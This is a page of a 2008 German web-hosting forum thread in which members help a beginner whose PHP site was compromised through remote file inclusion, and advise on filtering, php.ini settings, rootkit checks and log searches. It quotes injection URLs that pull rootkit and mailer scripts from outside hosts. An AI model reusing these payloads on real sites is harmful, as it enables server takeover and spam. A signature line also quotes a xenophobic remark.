Seite 2 von 4 ErsteErste 1234 LetzteLetzte
Ergebnis 11 bis 20 von 34

Thema: Spam Mails ohne Ende obwohl Kontaktformular offline

  1. #11
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Oberfranken
    Beiträge
    2.869

    Standard

    Zitat Zitat von kojak Beitrag anzeigen
    Merkwürdig...die Umgehen die Post Vars mit den GET Vars?]
    Muss nicht sein. Man kann z.B. mit wget die Variablen auch mit POST übergeben.

    Zitat Zitat von kojak Beitrag anzeigen
    meineseite.php?site=http://www.cmdlist.xpg.com.br/cmd.txt
    Na prima, dieses PHP-Script versucht, ein r0nin-Rootkit zu installieren.

    Zitat Zitat von kojak Beitrag anzeigen
    meineseite.php?site=http://www.vuls2008.kit.net/rev.txt
    Und das scheint mt so eine Art Formmailer zu sein. Was allerdings dieser riesen Datenwurm am Ende der Datei macht kann ich im Moment nicht sagen. Auf jeden Fall schein sich r3v3ng4ns@gmail.com über viele Mails zu freuen.

    Du solltest dringend mal Deine PHP-Scripten prüfen, was die so ungeprüft includen oder per load-Befehl reinholen.

    [Edit] Dieser Datenwurm scheint einfach die "PHPMailer"-Klasse zu sein, die ein Spammerhelfer "codiert" hat:
    Code:
    /**
     * PHPMailer - PHP email transport class
     * @package PHPMailer
     * @author Brent R. Matzelle
     * @copyright 2001 - 2003 Brent R. Matzelle
     */
    Geändert von homer (10.03.2008 um 21:22 Uhr)

    Ich hätte lieber 100 Nazis als Kunden, als einen Asylanten. - Klaus, 55, Bestatter

  2. #12
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    Der Datenwurm sind die Empfängeradressen..

    Schnapp dir am besten ne ASCII-Tabelle und such dir die Buchstaben zu den zugehörigen Codes. Ansonsten ersetzt der bestimmte Zeichen wie @, Leerzeichen und andere gegen das, was da in dem zweiten Array steht.
    Von ${2} wird ${1} + die Ersetzungen abgezogen.
    Quod non est in litteris, non est in munde.

  3. #13
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Oberfranken
    Beiträge
    2.869

    Standard

    Zitat Zitat von actro Beitrag anzeigen
    Der Datenwurm sind die Empfängeradressen..
    Nein, ich hab mal das Ergebnis dieser "unecrypt()"-Funktion nicht an eval übergeben, sonder in eine Datei schreiben lassen. Dann krieg ich den Quelltext zur besagten PHPMailer-Klasse.

    Ich hätte lieber 100 Nazis als Kunden, als einen Asylanten. - Klaus, 55, Bestatter

  4. #14
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    Ah..k.. ich bin von Erfahrungen mit älteren, ähnlichen Scripts ausgegangen..
    Noja..warum sollen die Jungs sich nicht auch weiterentwickeln..
    Quod non est in litteris, non est in munde.

  5. #15
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard Hi

    Echt peinlich! So ein blutiger Anfänger wie ich bin.
    So einen groben groben fehler. Die GET VAriable site wird
    direkt includet.

    Das ist echt schon peinlich.

    Nur damit ich nicht noch mehr Unsinn mache, falls
    jemand auf sowas dummes noch antworten möchte.

    Reicht es aus wenn ich die GET VARIABLE site
    überprüfe ob der string http:// oder www. enthält?
    Dann kann doch kein externes Skript mehr eingeschleust werden oder?

    Gruss, Dank mit roten Wangen
    Kodi

  6. #16
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Oberfranken
    Beiträge
    2.869

    Standard

    Zitat Zitat von kojak Beitrag anzeigen
    So einen groben groben fehler. Die GET VAriable site wird direkt includet.
    AUAAAAA!

    Zitat Zitat von kojak Beitrag anzeigen
    Reicht es aus wenn ich die GET VARIABLE site überprüfe ob der string http:// oder www. enthält?
    Hmmm, "www." ist schlecht, das muss nicht zwingend auftauchen. Nach "http:" oder "ftp:" solltest Du filtern. Besser: (vorsicht, stark versionabhängig!) In der php.ini die beiden Variablen "allow_url_fopen" und "allow_url_include" auf "Off" setzen:
    Code:
    allow_url_fopen = Off
    allow_url_include = Off
    AFAIK ist das eine systemweite Einstellung, die nicht nachträglich in der Apache-Konfig, per .htaccess oder mit einer dieser PHP-Funktionen (wie die heisst fällt mir grade net ein) geändert werden können. Allerdings kann es sein, dass einige ältere Scripte dann nicht mehr laufen.

    Andererseits brauchst Du Dir keinen Kopf mehr machen bezüglich von außen eingebundener Scripte, die werden dann von PHP selbst mit einer Fehlermeldung geknickt.

    Ich hätte lieber 100 Nazis als Kunden, als einen Asylanten. - Klaus, 55, Bestatter

  7. #17
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    Wenn Du keinen Zugriff auf das System hast, kannst Du das auch per .htaccess setzen in den meisten Fällen..

    Allerdings gehe ich mal stark davon aus, dass Dein System eh penetriert ist, von daher würde ich neu aufsetzen.

    Nachtrag: schau mal, ob du in /temp verdächtige Files findest. Das rootkit hab ich schon in anderen Versionen vorliegen, bei den meisten penetrierten Kisten habe ich auch einen Eggdrop gefunden, die wurden überwiegend als Warez-Schleudern per DCC mißbraucht.
    Geändert von actro (10.03.2008 um 23:23 Uhr)
    Quod non est in litteris, non est in munde.

  8. #18
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard hi

    Ihr erschlagt mich gleich richtig.
    Das Skript hab ich programmiert ohne das ich mir gross Gedanken über
    die Sicherheit gemacht hab. Was man nicht übersehen kann.

    Ich hatte das jemanden zum drüberschauen gegeben, als ich bemerkt habe
    das Sicherheit das Non Plus Ultra ist. Ich dachte er hatte richtig Plan.
    Da hat er mir paar Datenbankanfragen gecheckt und noch paar Dinge.
    Er hat nicht mal was gesagt wegen dem Include. Das hätte ich sogar
    merken müssen. Ich dachte immer die PHP Dateien, die von fremden
    Servern includet werden, werden auch nur auf dem Server ausgeführt.
    Lange Rede kurzer Sinn.

    Ich brauche dringenst dringens Hilfe das ich es Safe bekomm.
    Habt Ihr noch irgendwelche Tips wie ich es ersteinmal sicher bekomme.
    Ich danke euch allerdings erstnochmal sehr für eure Hilfe.
    Auch wenn kein Hilfreicher Hinweis mehr kommt.
    Lasst mich nicht allein

    WAs hab ich grad gelesen. Root Kit..watt datt denn nu schon wieder.
    Wenn mich mein Provider nun Kündigt ist das verherend für mich.
    Der Server ist nun das Zweite mal Down. Wenn er jetzt wieder on geht und das
    noch einmal passiert, dann __________________ flatline.
    Habt Ihr noch etwas am Start?

  9. #19
    Registrierte Benutzer Avatar von actro
    Registriert seit
    14.09.2005
    Ort
    Der Tunnel am Ende des Lichts
    Beiträge
    2.960

    Standard

    Hast du so etwas wie einen Rescue-Boot? Wenn ja, kannst Du auf rootkits checken.
    Wenn nicht, neu initialisieren lassen und ganz neu aufsetzen..
    Solange die Gefahr besteht, dass der Server übernommen wurde, gehört er nicht wieder ins Internet.

    Wenn Du Zugriff auf die Konsole hast, kannst du auch mit "locate cmd.txt" oder "locate cmd.gif" schauen, ob etwas heruntergeladen wurde.
    Ansonsten hilft dir ein "cat <hier das apache-log> |grep cmd >>hackt.txt" , die relevanten logeinträge in eine textdatei zu legen und sie durchzusehen.

    Wie das aussieht, kannst Du hier erkennen.
    Geändert von actro (11.03.2008 um 00:03 Uhr)
    Quod non est in litteris, non est in munde.

  10. #20
    Neues Mitglied
    Registriert seit
    07.03.2008
    Beiträge
    15

    Standard hm

    Leider hab ich keinen Zugriff auf irgendwas, ausser den Logfiles.
    Am Server kann ich nichts einstellen.
    Ich bin so müde und kann nicht schlafen.

    Was anderes noch.
    Könnte ich die Include Lücke nicht schliessen indem ich nur
    includes aus einem bestimmten Ordner zulasse.

    diephpseite.php?site=pages/seite.php

    So das nur die Seiten in dem Ordner includet werden dürfen?
    Ist das sicher deiner Meinung nach?
    Geändert von Kodi (11.03.2008 um 00:16 Uhr)

Seite 2 von 4 ErsteErste 1234 LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen